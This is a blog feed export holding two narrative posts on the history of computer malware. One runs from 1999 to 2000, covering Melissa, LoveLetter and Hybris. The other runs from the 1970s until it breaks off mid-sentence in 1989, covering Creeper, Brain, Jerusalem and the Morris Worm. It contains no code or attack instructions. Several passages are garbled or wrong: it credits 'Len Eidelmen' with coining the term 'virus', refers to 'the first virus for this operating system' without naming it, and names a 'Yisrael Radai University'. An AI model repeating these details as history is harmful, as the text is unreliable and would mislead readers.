The purchase was made in December by Aladdin Knowledge Systems, a well-known developer of equipment and software for computer security.&lt;br /&gt;&lt;br /&gt;A curious incident occurred with the publication of a computer virus warning in the December 21st edition of The New York Times. The author warned users about the appearance of a virus which spread via email and was already being detected in some networks. It later became evident that this scary virus was none other than the already well-known macro virus, Class.&lt;br /&gt;&lt;br /&gt;1999&lt;br /&gt;Strange as it may seem, the most significant news to come out of this year was not the emergence of a new computer virus, but an announcement about the long-planned purchase of the Australian antivirus vendor Cybec by the software giant Computer Associates (CA). With this purchase, CA added another antivirus product to its collection, having purchased Cheyenne Software at the end of 1996. Both products still exist to this day: CA Vet Anti-Virus and CA InoculateIT.&lt;br /&gt;&lt;br /&gt;Viruses, however, did not sit idly by, and in January we witnessed the emergence of a global epidemic with the Happy99 virus (also known as Ska). This was actually the first modern-day worm, which once again opened a new chapter in the history of malware evolution. It used MS Outlook, which had become a corporate standard in Europe and the US, to spread. Despite the fact that Happy99 first appeared at the beginning of 1999, it still regularly shows up as one of the top ten most widespread harmful programs to this day.&lt;br /&gt;&lt;br /&gt;At almost the same time, a very interesting macro virus for MS Word was detected: Caligula. It searched the system registry for keys corresponding to PGP (Pretty Good Privacy) programs and looked for the appropriate databases. If such databases were found, the virus initiated an FTP session and secretly sent files to a remote server.&lt;br /&gt;&lt;br /&gt;At the end of February, SK, the first virus to infect Windows HLP files, appeared.&lt;br /&gt;&lt;br /&gt;On the 26th of March, a global epidemic was caused by Melissa, the first macro virus for MS Word to combine Internet worm functionality as well. Immediately after infection, Melissa scanned the address book in MS Outlook and sent copies of itself to the first 50 addresses found. Like Happy99, Melissa did this without the knowledge or consent of the user, but the messages still appeared to be in the user's name. Fortunately, this macro virus was not complex and antivirus developers quickly released the necessary additions to their databases. The epidemic was contained quickly. Despite this, Melissa still managed to inflict significant damage on a range of computer systems: industry giants like Microsoft, Intel and Lockheed Martin were forced to temporarily shut down their corporate email systems. Estimates place the damage caused by the virus at several tens of millions of US dollars.&lt;br /&gt;&lt;br /&gt;Law enforcement agencies in the US (or cybercrime units, to be more precise) reacted exceptionally quickly to the Melissa virus. A short while thereafter, the author of the virus was discovered and arrested. He was 31-year-old David L. Smith, a programmer from New Jersey. On December 9th, he was found guilty and sentenced to 10 years in prison and fined $400,000.&lt;br /&gt;&lt;br /&gt;Law enforcement agencies were equally active on the other side of the Pacific Ocean as well. In Taiwan, the author of the CIH virus, earlier known only as Chernobyl, was exposed as Chen Ing Hao (notice the initials), a student at the Taiwan Technical Institute. However, due to a lack of charges from any of the local companies, the police had no basis for an arrest.&lt;br /&gt;&lt;br /&gt;On May 7th, a virus intruded on the Canadian company Corel. Under threat was its cash cow, Corel DRAW. 
The Gala virus (also known as GaLaDRieL) was written in the Corel SCRIPT language and became the first virus capable of infecting Corel DRAW files as well as Corel PHOTO-PAINT and Corel VENTURA.&lt;br /&gt;&lt;br /&gt;Another epidemic broke at the very beginning of the summer with the dangerous Internet worm ZippedFiles (also known as ExploreZip). The virus came in the form of an EXE file which, once installed, would destroy files of some of the more popular applications. While the worm was not as widespread as Melissa, the damage incurred was estimated to be several times higher. Despite a quick reaction from antivirus companies in neutralizing the virus, a relapse was recorded in December. The modified version was changed so that the body of the virus was compressed using the Neolite compression utility. If the antivirus program didn't recognize this compression format, then the worm escaped unnoticed. At the time, none of the antivirus programs recognized this format. It was only in June of 2000 that AntiViral Toolkit Pro (AVP) was integrated with file support for Neolite.&lt;br /&gt;&lt;br /&gt;In August, an Internet worm named Toadie (or Termite) was detected. In addition to infecting files in DOS or Windows, the virus attached copies of itself to emails sent via Pegasus and attempted to spread through IRC channels.&lt;br /&gt;&lt;br /&gt;October brought the computer industry three new surprises. First was the discovery of the Infis virus, which was the first virus for this operating system, installing itself at the highest levels of platform security and affecting system drivers. This made the virus difficult to contain. The second surprise consisted of antivirus companies warning users about the first computer virus for MS Project. In actuality, this was a multi-platform virus that infected files of MS Word just as well as MS Project. 
The third surprise was the emergence, in July, of yet another script virus, Freelinks, one of the predecessors of the well-known LoveLetter virus.&lt;br /&gt;&lt;br /&gt;In November, the world was shaken by the emergence of a new generation of worms which spread via email without attached files and penetrated computers when infected messages were read. The first of these was Bubbleboy, which was immediately followed by KakWorm. Viruses of this type exploited an Internet Explorer loophole, and although Microsoft issued a patch the same month, KakWorm remained widespread for a long time.&lt;br /&gt;&lt;br /&gt;That same month, the USA and Europe recorded several incidents of infection by FunLove, a Windows virus.&lt;br /&gt;&lt;br /&gt;December 7th was notable for the detection of the latest of a long line of Trojans authored by a Brazilian virus writer known as Vecna. The very dangerous and complex Babylonia virus turned a new page in the history of virus creation. It was the first worm which was capable of remote self-rejuvenation. Every minute it would connect to a server in Japan and download a list of virus modules. If it found modules there newer than those on the infected computer, then it immediately downloaded them. Later, this same technique would be employed by Sonic, Hybris, and other viruses.&lt;br /&gt;&lt;br /&gt;In the middle of the year, the antivirus industry officially divided into two camps in regard to their approach to potential Y2K threats. One camp strongly promoted the belief that the computer underground had prepared a surprise in the form of several hundred thousand viruses capable of shaking human civilization to its core. The subtext of this warning was clear: install antivirus software and you would be saved from attack. The second camp of antivirus companies logically opposed the first and attempted to maintain calm among scared users. 
Later, the warnings were proved baseless, and the year 2000 came in the same way as any other year.&lt;br /&gt;&lt;br /&gt;A few curious stories were abroad as well. A compact disc distributed with the November edition of the Hungarian magazine Uj Alaplap contained, in addition to useful information, a distinctly unpleasant surprise: two macro viruses for MS Word, Class.B and Opey.A.&lt;br /&gt;&lt;br /&gt;2000&lt;br /&gt;The year began unexpectedly for users of Windows 2000 and Visio, a popular application for creating diagrams and flow-charts. Microsoft had not even finished announcing the release of a fully functional commercial version of their operating system when members of the underground group 29A set Inta loose. The virus was the first to infect Windows 2000 files. Shortly after, two viruses emerged almost simultaneously, Unstable and Radiant, which marked Visio's demise. The second incident brought to light a sick joke: the viruses had been released by Microsoft, which, not long after Unstable and Radiant, purchased Visio Corporation.&lt;br /&gt;&lt;br /&gt;In April, the first macro virus of Russian origin for MS Word was recorded. Proverb was detected in 10 Downing Street, the office of the British prime minister. It can only be hoped that the English authorities heeded the advice of the Russian proverb, 'Don't put off till tomorrow what you can drink today'.&lt;br /&gt;&lt;br /&gt;May 5th broke a record in the Guinness Book of Records with the script virus LoveLetter. Everything occurred exactly as Eugene Kaspersky had predicted in November of 1998. Naïve users couldn't even imagine that harmless VBS files and TXT files could contain a harmful virus. Once loaded, it destroyed a range of files and sent itself to all addresses in the MS Outlook address book. 
The transparency of the source code more or less guaranteed that new modifications of the virus would appear throughout the year, and currently there are more than 90 of them in circulation.&lt;br /&gt;&lt;br /&gt;On the 6th of June, the Timofonica virus was detected; this was the first computer virus that employed, in a limited manner, mobile phones. In addition to spreading via email, the virus sent messages to random mobile phone numbers in the MoviStar cellular network, which belonged to the global telecommunications giant Telefonica. The virus had no other effect on mobile phones, despite the fact that many mass media outlets were quick to name Timofonica the first 'cellular' virus.&lt;br /&gt;&lt;br /&gt;The summer of 2000 was hot, particularly as far as mobile phone viruses were concerned. While this period is usually a vacation time for virus writers and antivirus experts alike, the former, by all accounts, decided to surprise the latter. In July, a group known as the Cult of the Dead Cow produced a new version of the Back Orifice virus (BO2K). This occurred at the annual DefCon conference (in a jab at Microsoft's DevCon) and evoked a flood of messages from frightened users to antivirus vendors. In reality, the new version posed little more harm than its predecessor and was promptly added to leading antivirus vendors' databases. The distinguishing feature of BO2K was its drift towards legitimate commercial remote administration utilities; the program was visible upon installation. Despite this, it could still be used for illicit purposes and was classified by antivirus companies as a Backdoor Trojan.&lt;br /&gt;&lt;br /&gt;July saw the appearance of three exceptionally interesting viruses. Star was the first virus designed for AutoCAD packages. Dilber was distinguished by the fact that it contained code from five other viruses, including CIH, SK, and Bolzano. 
Depending on the date, Dilber activated processes from one of its components, earning it the nickname Shuttle Virus. The third interesting virus was an Internet worm called Jer which employed a relatively clumsy means of penetrating computers. A script program (the worm's body) was uploaded to a website and was automatically activated when the corresponding HTML page was opened. After this, users received a warning that an unidentified file was found on the disc. It was a calculated risk relying on human error: it was hoped that users would inadvertently answer 'yes' to be rid of the script program. The appearance of this worm confirmed a new fashion in the spread of viruses through the Internet. First, the worm is placed on a website, and then a mass marketing campaign is conducted to attract users. The calculated risk paid off: for every thousand users, a few dozen would let the virus in.&lt;br /&gt;&lt;br /&gt;In August, the Liberty virus was discovered - the first harmful Trojan program to affect the PalmOS operating system of the Palm Pilot. Upon installation, it deleted files but was incapable of replicating. In September, this new class of harmful programs was extended with the first true virus for PalmOS, Phage. It represented a classic parasitic virus which, after installing and infecting files, proceeded to delete them and record its own code.&lt;br /&gt;&lt;br /&gt;In the beginning of September, a computer virus by the name of Stream was discovered which was capable of manipulating the ADS (alternate data streams) of NTFS file systems. This virus posed no particular threat. More dangerous was the technology of accessing ADS, insofar as no antivirus program was capable of scanning this location. Unfortunately, the virus evoked an inadequate reaction among some large antivirus firms, which accused Kaspersky Lab of scaremongering. 
Despite the accusations, none of the opponents were able to offer any concrete arguments confirming the position they put forth regarding the safety of ADS in NTFS. The problem of antivirus protection for NTFS remains to this day a vital issue, insofar as only a few antivirus scanners have learned to search for viruses in ADS.&lt;br /&gt;&lt;br /&gt;October saw the appearance of the first virus for PIF files (Fable), and the first virus written in the PHP scripting language (Pirus). Neither virus has to this day been discovered 'in the wild'. At the same time, a scandal arose when Microsoft's internal systems were hacked and left open for several months by a group of unknown hackers from St. Petersburg. Entry was gained through a simple loophole using a network worm called QAZ. What was curious about this incident was the fact that at the time the system hack was discovered, the worm in question was already included in practically all antivirus databases. This caused some misgivings about the competency of Microsoft personnel or, perhaps, their malicious intent. In any case, as of the writing of this book, the guilty parties have yet to be located.&lt;br /&gt;&lt;br /&gt;A notable event occurred in November. Kaspersky Labs, having become one of the antivirus industry's major players in three short years, changed the name of its flagship product. AntiViral Toolkit Pro (AVP) became Kaspersky Anti-Virus and took on a new logo.&lt;br /&gt;&lt;br /&gt;This same month brought the detection of a technologically complex and dangerous virus called Hybris. This virus was written by the Brazilian virus writer Vecna, who further developed his first self-rejuvenating virus, Babylonia, taking into account earlier errors. The main innovation was the use of websites and list servers (alt.comp.virus in particular) to load new modules of the virus onto infected computers. 
While a website could simply be taken down, list servers were an ideal alternative for spreading, as they were far harder to take down. Further, Hybris employed a 128-bit RSA key for identifying modules actually written by the author.&lt;br /&gt;&lt;br /&gt;As a whole, 2000 was the year that email again proved itself to be the best way to transmit viruses. According to Kaspersky Labs' support statistics, approximately 85% of all registered infections occurred via email. The year was also notable for a wave of activity among virus creators with Linux. Altogether, there were 37 registered new viruses and Trojan programs created for the Linux operating system. Consequently, the overall quantity of Linux viruses reached 43, which represented a seven-fold growth in 2000 alone. Finally, a change in the most widespread viruses occurred. Up until this year, macro viruses had been the most common, but once 2000 was over, this place was taken by script viruses.</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/8059337025753580007/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=8059337025753580007' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/8059337025753580007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/8059337025753580007'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/third-decade-of-malware-history.html' title='The Third decade of Malware History'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-3605309670277165105</id><published>2008-06-07T09:49:00.000-07:00</published><updated>2008-06-07T09:55:46.743-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cyber Defense'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='software'/><category scheme='http://www.blogger.com/atom/ns#' term='liveware'/><category scheme='http://www.blogger.com/atom/ns#' term='malicious'/><category scheme='http://www.blogger.com/atom/ns#' term='funware'/><category scheme='http://www.blogger.com/atom/ns#' term='adware'/><category scheme='http://www.blogger.com/atom/ns#' term='allware'/><category scheme='http://www.blogger.com/atom/ns#' term='virusopedia'/><category scheme='http://www.blogger.com/atom/ns#' term='pornware'/><category scheme='http://www.blogger.com/atom/ns#' term='history'/><category scheme='http://www.blogger.com/atom/ns#' term='Computer Virus'/><title type='text'>Malicious De History</title><content type='html'>History of Malicious Programs&lt;br /&gt;Malicious software may seem like a relatively new concept. The epidemics of the past few years have introduced the majority of computer users to viruses, worms and Trojans - usually because their computers were attacked. The media has also played a role, reporting more and more frequently on the latest cyber threats and virus writer arrests.&lt;br /&gt;&lt;br /&gt;However, malicious software is not really new. 
Although the first computers were not attacked by viruses, this does not mean they were not potentially vulnerable. It was simply that when information technology was in its infancy, not enough people understood computer systems to exploit them.&lt;br /&gt;&lt;br /&gt;But once computers became slightly more common, the problems started. Viruses started appearing on dedicated networks such as the ARPANET in the 1970s. The boom in personal computers, initiated by Apple in the early 1980s, led to a corresponding boom in viruses. As more and more people gained hands-on access to computers, they were able to learn how the machines worked. And some individuals inevitably used their knowledge with malicious intent.&lt;br /&gt;&lt;br /&gt;As technology has evolved, so have viruses. In the space of a couple of decades, we have seen computers change almost beyond recognition. The extremely limited machines which booted from a floppy disk are now powerful systems that can send huge volumes of data almost instantaneously, route email to hundreds or thousands of addresses, and entertain individuals with movies, music and interactive Web sites. And virus writers have kept pace with these changes.&lt;br /&gt;&lt;br /&gt;While the viruses of the 1980s targeted a variety of operating systems and networks, most viruses today are written to exploit vulnerabilities in the most commonly used software: Microsoft Windows. The increasing number of vulnerable users is now being actively exploited by virus writers. The first malicious programs may have shocked users, by causing computers to behave in unexpected ways. However, the viruses which started appearing in the 1990s present much more of a threat: they are often used to steal confidential information such as bank account details and passwords.&lt;br /&gt;&lt;br /&gt;So malicious software has turned into big business. An understanding of contemporary threats is vital for safe computing. 
This section gives an overview of the evolution of malware: it offers a glimpse of some historical curiosities, and provides a framework to help understand the origins of today's cyber-threats.&lt;br /&gt;&lt;br /&gt;Historians are still debating when the first computer virus really appeared. We do know a few things for certain, however: the first computer, which is generally considered to have been invented by Charles Babbage, did not have any viruses. By the mid-1970s, the Univac 1108 and IBM 360/370 did.&lt;br /&gt;&lt;br /&gt;Nevertheless, the idea for computer viruses actually appeared much earlier. Many consider the starting point to be the work of John von Neumann in his studies on self-reproducing mathematical automata, famous in the 1940s. By 1951, von Neumann had already proposed methods for demonstrating how to create such automata.&lt;br /&gt;&lt;br /&gt;In 1959, the British mathematician Lionel Penrose presented his view on automated self-replication in his Scientific American article 'Self-Reproducing Machines'. Unlike von Neumann, Penrose described a simple two-dimensional model of this structure which could be activated, multiply, mutate and attack. Shortly after Penrose's article appeared, Frederick G. Stahl reproduced this model in machine code on an IBM 650.&lt;br /&gt;&lt;br /&gt;It should be noted that these studies were never intended to provide a basis for the future development of computer viruses. On the contrary, these scientists were striving to perfect this world and make it more suitable for human life. And it was these works that laid the foundation for many later studies on robotics and artificial intelligence.&lt;br /&gt;&lt;br /&gt;In 1962, a group of engineers from America's Bell Telephone Laboratories, V. Vyssotsky, G. McIlroy, and Robert Morris, created a game called 'Darwin.'
The game consisted of a so-called umpire in the memory of the computer that determined the rules and order of battle between competing programs created by the players. The programs could track and destroy opponents' programs and, more importantly, multiply. The point of the game was to delete your opponent's programs and gain control over the battlefield.&lt;br /&gt;&lt;br /&gt;The scientists' theoretical work and the engineers' harmless game were overshadowed from the moment the world realized that the theory of self-replicating units could be used, equally successfully, for completely different purposes.&lt;br /&gt;&lt;br /&gt;1970s&lt;br /&gt;Sometime in the early 1970s, the Creeper virus was detected on ARPANET, a US military computer network which was the forerunner of the modern Internet. Written for the then-popular Tenex operating system, this program was able to gain access independently through a modem and copy itself to the remote system. Infected systems displayed the message, 'I'M THE CREEPER : CATCH ME IF YOU CAN.'&lt;br /&gt;&lt;br /&gt;Shortly thereafter, the Reaper program was anonymously created to delete Creeper. Reaper was a virus: it spread to networked machines and, if it located a Creeper virus, Reaper would delete it. Even the participants are unable to say whether Reaper was a response to Creeper, or if it was created by the same person or persons who created Creeper in order to correct their mistake.&lt;br /&gt;&lt;br /&gt;1974&lt;br /&gt;A virus dubbed Rabbit appeared: it was called Rabbit because it didn't do anything except multiply and spread to other machines. The name was a comment on the speed with which the program multiplied. It clogged the system with copies of itself, impairing system performance. Once Rabbit multiplied to a certain level on an infected machine, the virus would crash.&lt;br /&gt;&lt;br /&gt;1975&lt;br /&gt;Pervading Animal, another game, this time written for a Univac 1108, appeared in 1975.
To this day, analysts argue about whether this was another virus or the first Trojan.&lt;br /&gt;&lt;br /&gt;The rules of the game were simple: the player would think of an animal and the program asked questions in an attempt to identify it. The game was equipped with a self-correction function; if the program was unable to guess the animal, it would update itself and enter new questions. The new modernized version overwrote the old version but, in addition to this, copied itself to other directories. After some time, as a result, all directories would contain copies of 'Pervading Animal.' It is unlikely that engineers appreciated this because the combined volume of the game's copies occupied a significant amount of disc space.&lt;br /&gt;&lt;br /&gt;Was this simply a mistake by the game's creator or a conscious attempt to clutter up the system? It is difficult to say. The boundary between programs functioning incorrectly and malicious code was unclear in those days.&lt;br /&gt;&lt;br /&gt;Univac programmers attempted to use the Creeper-Reaper model to control Pervading Animal: a new version of the game scanned for older versions and destroyed them. However, the issue was resolved fully only when Exec 8, a new version of the operating system, was released. The file system was modified and the game was unable to multiply.&lt;br /&gt;&lt;br /&gt;Early 1980s&lt;br /&gt;As computers gained in popularity, more and more individuals started writing their own programs. Advances in telecommunications provided convenient channels for sharing programs through open-access servers such as BBS - the Bulletin Board System. Eventually university BBS servers evolved into a global data bank and were available in all developed countries. 
The first Trojans appeared in large quantities: programs that couldn't self-replicate or spread, but did damage systems once downloaded and installed.&lt;br /&gt;&lt;br /&gt;1981&lt;br /&gt;The widespread use of Apple II computers predetermined this machine's fate in attracting the attention of virus writers. It is not surprising that the first large-scale computer virus outbreak in history occurred on the Apple II platform.&lt;br /&gt;&lt;br /&gt;Elk Cloner spread by infecting the Apple II's operating system, stored on floppy disks. When the computer was booted from an infected floppy, a copy of the virus would automatically start. The virus would not normally affect the running of the computer, except for monitoring disk access. When an uninfected floppy was accessed, the virus would copy itself to the disk, thus infecting it, too, slowly spreading from floppy to floppy.&lt;br /&gt;&lt;br /&gt;The Elk Cloner virus infected the boot sector for Apple II computers. In those days, operating systems were stored on floppy disks: as a result the floppies were infected and the virus was launched every time the machine was booted up. Users were startled by the side effects and often infected friends by sharing floppies, since most people had no idea what viruses were, much less how they spread.&lt;br /&gt;&lt;br /&gt;The Elk Cloner payload included rotating images, blinking text and joke messages:&lt;br /&gt;&lt;br /&gt;ELK CLONER:&lt;br /&gt;THE PROGRAM WITH A PERSONALITY&lt;br /&gt;IT WILL GET ON ALL YOUR DISKS&lt;br /&gt;IT WILL INFILTRATE YOUR CHIPS&lt;br /&gt;YES, IT'S CLONER&lt;br /&gt;IT WILL STICK TO YOU LIKE GLUE&lt;br /&gt;IT WILL MODIFY RAM, TOO&lt;br /&gt;SEND IN THE CLONER!&lt;br /&gt;1983&lt;br /&gt;Len Eidelmen first coined the term 'virus' in connection with self-replicating computer programs.
On November 10th, 1983, at a seminar on computer safety at Lehigh University, this grandfather of modern computer virology demonstrated a virus-like program on a VAX 11/750 system. The program was able to install itself to other system objects. A year later, at the 7th annual information security conference, he defined the phrase 'computer virus' as a program which is able to 'infect' other programs by modifying them to install copies of itself.&lt;br /&gt;&lt;br /&gt;1986&lt;br /&gt;The first global IBM-compatible virus epidemic was detected. Brain, which infected the boot sector, was able to spread practically worldwide within a few months. The almost total lack of awareness in the computing community of how to protect machines against viruses ensured Brain's success. In fact, the appearance of numerous science fiction works on the topic only strengthened the panic, instead of teaching people about security.&lt;br /&gt;&lt;br /&gt;The Brain virus was written by a 19-year-old Pakistani programmer, Basit Farooq Alvi, and his brother Amjad, and included a text string containing their names, address and telephone number. According to the virus's authors, who worked in sales for a software company, they wanted to gauge the level of piracy in their country. Aside from infecting a disk's boot sector and changing the disk name to '© Brain', the virus did nothing; it had no real payload, and did not corrupt data. Unfortunately, the brothers lost control of their so-called experiment and Brain spread worldwide.&lt;br /&gt;&lt;br /&gt;Interestingly enough, Brain was also the first 'stealth virus.' When an attempt to read the infected sector was detected, the virus would display the original, uninfected data.&lt;br /&gt;&lt;br /&gt;That same year, a German programmer, Ralf Burger, invented the first programs that could copy themselves by adding their code to executable DOS files in COM format.
The working model of the program, named Virdem, was introduced by Burger in December 1986 in Hamburg at an underground computer forum, the Chaos Computer Club. Though most of the hackers at the event specialised in attacking VAX/VMS systems, they were still interested in the concept.&lt;br /&gt;&lt;br /&gt;1987&lt;br /&gt;The Vienna virus appeared: its appearance and subsequent spread around the world was hotly debated as the global community tried to discover the identity of the author. Franz Swoboda was the first person to detect the virus: his warning about the discovery of a self-replicating program named Charlie was publicized by many information technology companies and attracted the attention of the media as well. As could be expected, many people were interested in discovering the author and the source of the epidemic. Information leaked out that Swoboda had received the virus from Ralf Burger, who completely denied Swoboda's story, and claimed that, on the contrary, he had received the virus from Swoboda. It was never revealed who had actually created the malicious program.&lt;br /&gt;&lt;br /&gt;Despite the confusion surrounding the author of Vienna, its appearance was notable for another reason. One of its potential authors, Ralf Burger, forwarded a copy to Bernt Fix, who was able to neutralize the virus. This was the first occasion when someone was able to neutralize a virus. Thus Fix was a precursor of modern antivirus professionals, although contemporary antivirus experts not only analyze and neutralize viruses, but more importantly release protection, detection and disinfection modules.&lt;br /&gt;&lt;br /&gt;Burger capitalized on Fix's work, and published the code used to neutralize Vienna in his book, Computer Viruses: The Disease of High Technology, which was analogous to B. Khizhnyak's Writing Viruses and Anti-Viruses. In his book, Burger explained how the virus code could be modified to eliminate its ability to replicate.
However, the book probably gained popularity for explaining how viruses are created, serving as a stimulus for thousands of viruses which were partly or completely developed from ideas expressed in this book.&lt;br /&gt;&lt;br /&gt;Several other IBM-compatible computer viruses appeared this year as well:&lt;br /&gt;&lt;br /&gt;the famous Lehigh virus, named in honor of the university in Pennsylvania where it was first detected; this university is ironically the alma mater of the father of modern computer virology; &lt;br /&gt;the Suriv family of viruses; &lt;br /&gt;a number of boot-sector viruses in various countries: Yale in the US, Stoned in New Zealand, Ping Pong in Italy; &lt;br /&gt;the first self-encrypting file virus, Cascade. &lt;br /&gt;Lehigh made history as the first virus that caused direct damage to data: the virus destroyed information on disks. Fortunately, there were several computer experts at Lehigh University who were skilled at analyzing viruses. As a result, the virus never left the university, and Lehigh was never detected in the wild.&lt;br /&gt;&lt;br /&gt;The Lehigh virus initiated a destructive routine that eventually deleted the virus as well as valuable data. Lehigh first infected only the command.com system files. After infecting four files it began destroying data, i.e. it eventually destroyed itself as well.&lt;br /&gt;&lt;br /&gt;By this time, users had begun taking security more seriously and learning how to protect themselves against viruses. More cautious users quickly learned to monitor the command.com file size once they knew that an increase in the file size of command.com was the first sign of potential infection.&lt;br /&gt;&lt;br /&gt;The Suriv family of viruses (try reading the name backwards), written by an unidentified programmer from Israel, was just as interesting.
As with the Brain virus, it is difficult to determine whether this was merely an experiment that spun out of control or the premeditated creation of a malicious program. Many antivirus experts were inclined to think that it was an experiment. The discovery at Yisrael Radai University of code fragments supported this version. The university was able to show that the virus's author was attempting to change the process for installing files in EXE format and that the last modification of the virus was only a debugging version.&lt;br /&gt;&lt;br /&gt;The first member of this virus family, aptly named by the author Suriv-1, was able to infect accessed COM files in real time. To do this, the virus loaded itself into the computer's memory and remained active until the computer was turned off. This allowed the virus to intercept file operations and, if the user loaded a COM file, to immediately infect it. This facilitated the almost instant spread of the virus to removable storage media.&lt;br /&gt;&lt;br /&gt;Suriv-2, as opposed to its predecessor, targeted EXE files. It was, to all intents and purposes, the first virus able to penetrate EXE files. The third incarnation, Suriv-3, combined characteristics from the first and second versions and was able to infect both COM and EXE files.&lt;br /&gt;&lt;br /&gt;The fourth modification of the virus, named Jerusalem, appeared shortly thereafter and was able to spread quickly worldwide; Jerusalem caused a worldwide virus epidemic in 1988.&lt;br /&gt;&lt;br /&gt;The last significant event of 1987 was the appearance of the encrypted Cascade virus, which was named after part of its payload. Once the virus was activated, the symbols on the screen cascaded down to the bottom line. The virus consisted of two parts: the virus body and an encryption routine. The latter encrypted the body of the virus so that it appeared different in every infected file.
After loading the file, control was transferred to the encryption routine, which decoded the virus body and transferred control to it.&lt;br /&gt;&lt;br /&gt;This virus can be considered the predecessor of polymorphic viruses, which have no permanent program code yet maintain their functionality. However, unlike future polymorphic viruses, Cascade encoded only the body of the virus. The size of the infected file was used as the decryption key. The decryption routine itself remained unchanged, which allows modern antivirus solutions to detect the virus with ease.&lt;br /&gt;&lt;br /&gt;In 1988, Cascade caused a serious incident in IBM's Belgian office and served as the impetus for IBM's own antivirus product development. Prior to this, any antivirus solutions developed at IBM had been intended for internal use only.&lt;br /&gt;&lt;br /&gt;Later, Mark Washburn combined information published by Ralf Burger on the Vienna virus with the concept of self-encryption used in Cascade and created the first family of polymorphic viruses: the Chameleon family.&lt;br /&gt;&lt;br /&gt;IBM computers were not alone: viruses were written for Apple Macintosh, Commodore Amiga, and Atari ST.&lt;br /&gt;&lt;br /&gt;In December 1987, the first major local network epidemic occurred: the Christmas Tree Worm, which was written in REXX, spread on VM/CMS-9 operating systems. The worm was unleashed on the Bitnet network on December 9th from a West German university through a European Academic Research Network (EARN) portal and then onto IBM's Vnet. Within four days (on December 13th), the virus had flooded the network. Upon loading, the virus displayed a Christmas tree on-screen and sent copies of itself to all network users whose addresses were listed in the NAMES and NETLOG system files.&lt;br /&gt;&lt;br /&gt;1988&lt;br /&gt;Suriv-3, or the Jerusalem virus, as it is known today, caused a major epidemic in 1988.
It was detected in many enterprises, government offices and academic institutions on Friday, May 13th. The virus struck all over the world, but the US, Europe and the Near East were hit hardest. Jerusalem destroyed all loaded files on infected machines.&lt;br /&gt;&lt;br /&gt;May 13th 1988 came to be known as Black Friday. Ironically, antivirus experts and virus writers all pay close attention when the 13th of any month falls on a Friday. Virus writers are more active, while virus analysts treat it as a professional mini-holiday.&lt;br /&gt;&lt;br /&gt;By this time, many antivirus companies had been established around the world. Generally, these were small firms, usually with two or three people. The software consisted of simple scanners that performed context searches to detect unique virus code sequences.&lt;br /&gt;&lt;br /&gt;Users also appreciated the immunizers that came with the scanners. These immunizers would modify programs in such a way that a virus would think the computer was already infected and leave them untouched. Later, when the quantity of viruses increased into the hundreds, immunizers were rendered ineffective, as the number of immunizers required for the viruses in the wild was simply unrealistic to manufacture.&lt;br /&gt;&lt;br /&gt;Both types of antivirus programs were either distributed for free or were sold for ridiculously low prices. Despite this, they failed to gain enough popularity to effectively counter virus epidemics. Furthermore, the antivirus programs were completely helpless in the face of new viruses: imperfect channels for data transmission and the lack of a unified worldwide computer network like the modern Internet made the delivery of updated versions of antivirus programs extremely difficult.&lt;br /&gt;&lt;br /&gt;The spread of viruses like Jerusalem, Cascade, Stoned and Vienna was also facilitated by human factors. First, users of that era did not know enough about the need for antivirus protection.
Second, many users, and even professionals, didn't believe in the existence of computer viruses.&lt;br /&gt;&lt;br /&gt;For instance, even Peter Norton, whose name is synonymous today with many products of US-based Symantec, was skeptical about computer viruses at one stage in his career. He declared their existence to be a myth and compared them to stories of large crocodiles inhabiting the sewers of New York. This incident didn't stop Symantec, however, from shortly after developing its own antivirus project, Norton AntiVirus.&lt;br /&gt;&lt;br /&gt;This was an important year for the antivirus community as well: the first electronic forum devoted to antivirus security was opened on April 22. This was the Virus-L forum on the Usenet network, created by Ken van Wyk, a university colleague of Fred Cohen's.&lt;br /&gt;&lt;br /&gt;The first widespread virus hoax was also registered in 1988. This very interesting phenomenon refers to the spread of rumors about dangerous new viruses. Actually, in some cases, these rumors worked like a virus. Scared users would spread these rumors at the speed of light. It goes without saying that these hoaxes did not harm anyone; however, they used up bandwidth and users' nerves and discredited those that initially believed the rumors.&lt;br /&gt;&lt;br /&gt;Mike RoChennel (a pseudonym derived from the word 'Microchannel') was the author of one of the first hoaxes. In October 1988, Mike sent a large number of messages to BBSs regarding a virus which could transfer from one 2400 baud modem to another. A suggested antidote to this virus was to use modems with a speed of 1200 baud. However ridiculous this may have sounded, many users did indeed heed this advice.&lt;br /&gt;&lt;br /&gt;Another such hoax was released by Robert Morris about a virus spreading over networks and changing port and drive configurations. According to the warning, the alleged virus infected 300,000 computers in the Dakotas in under 12 minutes.
November 1988: a network epidemic caused by the Morris Worm. The virus infected over 600 computer systems in the US (including the NASA research center) and almost brought some to a complete standstill. Like the Christmas Tree worm, the virus sent unlimited copies of itself and completely overloaded the networks.&lt;br /&gt;&lt;br /&gt;In order to multiply, the Morris Worm exploited a vulnerability in UNIX operating systems on VAX and Sun Microsystems platforms. As well as exploiting the UNIX vulnerability, the virus used several innovative methods to gain system access such as harvesting passwords.&lt;br /&gt;&lt;br /&gt;The overall losses caused by the 'Morris Worm' virus were estimated at US $96 million, a significant sum at the time.&lt;br /&gt;&lt;br /&gt;Finally, a popular antivirus program, Dr. Solomon's Anti-Virus Toolkit, was released onto the market in 1988. The program was created by UK programmer Alan Solomon, and was widely used until 1998 when the company was taken over by US-based Network Associates (NAI).&lt;br /&gt;&lt;br /&gt;1989&lt;br /&gt;The Datacrime and FuManchu (a Jerusalem modification) viruses as well as the virus families Vacsina and Yankee appeared.&lt;br /&gt;&lt;br /&gt;The Datacrime virus was extremely dangerous: from October 13th through December 31st, it initiated low-level formatting of a hard disk's zero cylinder, 